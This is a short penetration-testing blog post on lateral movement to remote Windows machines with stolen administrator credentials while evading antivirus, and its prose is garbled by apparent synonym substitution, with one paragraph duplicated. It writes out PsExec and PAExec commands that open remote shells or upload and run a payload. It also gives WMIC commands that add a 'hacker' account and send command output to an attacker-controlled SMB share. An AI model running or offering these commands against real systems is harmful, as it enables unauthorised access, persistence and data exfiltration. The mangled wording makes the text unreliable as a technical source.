Most Penetration Testers volition know in addition to beloved Metasploit’s PsExec module for running commands on remote Windows machines, if you’re non familiar amongst it – it allows yous to guide keep a compromised Local Administrator work organisation human relationship in addition to purpose it to execute commands on the remote car (or to upload Meterpreter of course! These methods all ask the mightiness to write to Admin$ on the remote machine, which basically way a Local Administrator account.
Sometimes however, the psexec module from Metasploit gets eaten past times Anti-virus engines, which is frustrating in addition to delays a tester going most their work. So he’re a twain of tricks for getting to a greater extent than or less AV chop-chop – for when yous simply desire to run your commands in addition to larn dorsum to Starbucks.
It plant something similar this:
Metasploit’s PsExec
It’s available inwards Metasploit nether exploit/windows/smb/psexec in addition to all it requires is an RHOST, SMBUser in addition to SMBPass
Sometimes however, the psexec module from Metasploit gets eaten past times Anti-virus engines, which is frustrating in addition to delays a tester going most their work. So he’re a twain of tricks for getting to a greater extent than or less AV chop-chop – for when yous simply desire to run your commands in addition to larn dorsum to Starbucks.
PsTools in addition to PsExec
Although Meterpreter’s PsExec is ofttimes picked upwards past times anti-virus, I personally notice that the master PsTool PsExec isn’t! Which is most convenient, download it hither in addition to give it a try: https://technet.microsoft.com/en-gb/sysinternals/bb896649.aspxIt plant something similar this:
psexec \TargetIP -u Admin -p Password1 cmd (Where "cmd" requests that it spawns an interactive ascendancy shell)
PowerAdmin amongst PaExec
H5N1 squeamish option to PsExec is PaExec available here: http://www.poweradmin.com/paexec/, its usage is basically the same, attempt this:PAExec \TargetIP -u Admin -p Password1 -s cmd.exeDon’t experience similar a ascendancy vanquish but instead desire to upload your ain tools? (or veil-evasion payload perhaps…), in addition to thus give this ane a shot:
PAExec \TargetIP -u Admin -p Password1 -i -c Payload.exeThis volition upload payload.exe to the remote car in addition to execute it!
WMIC
Finally, when all else fails I line out WMIC, which although it’s an older method it seems to guide keep fallen out of usage in addition to many testers I’ve worked amongst are either unaware of it, or guide keep forgotten of its existence. Easy to purpose though, something similar this:wmic /node:TargetIP /username:Admin /password:Password1 procedure telephone band exercise "add user hacker Hacker1 /add"The commands hither execute blindly, which whatsoever Tester worth her common salt tin bargain with, but a quick hack volition larn yous the ascendancy output. Spin upwards a network part that tin endure written past times the compromised user (or “Everybody”) in addition to yous tin redirect the output to an SMB share!
wmic /node:TargetIP /username:Admin /password:Password1 procedure telephone band exercise "ipconfig >> \AttcackerIPresults.txt"So that’s few unlike ways of achieving the same thing, but to a greater extent than ofttimes than non it’s ever skillful to guide keep a Plan B in addition to C, peculiarly when anti-virus is getting a flake big for its boots!
